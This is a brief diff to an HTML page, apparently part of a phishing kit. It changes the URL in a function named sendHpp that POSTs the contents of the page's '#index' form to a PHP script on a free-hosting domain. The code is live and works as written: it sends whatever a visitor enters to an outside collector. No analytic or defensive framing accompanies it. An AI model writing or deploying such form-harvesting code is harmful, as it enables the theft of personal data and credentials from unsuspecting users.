--- a/onee.html
+++ b/onee.html
@@ -584,7 +584,7 @@ function sendHpp(){
     
     $.ajax({
         type: 'POST',
-        url: 'https://kesempatan-001-site1.jtempurl.com/bnd/on.php',
+        url: 'https://kesempatan-001-site1.jtempurl.com/bdd/on.php',
         data: $('#index').serialize(),
         datatype: 'JSON',   
     complete: function(){    
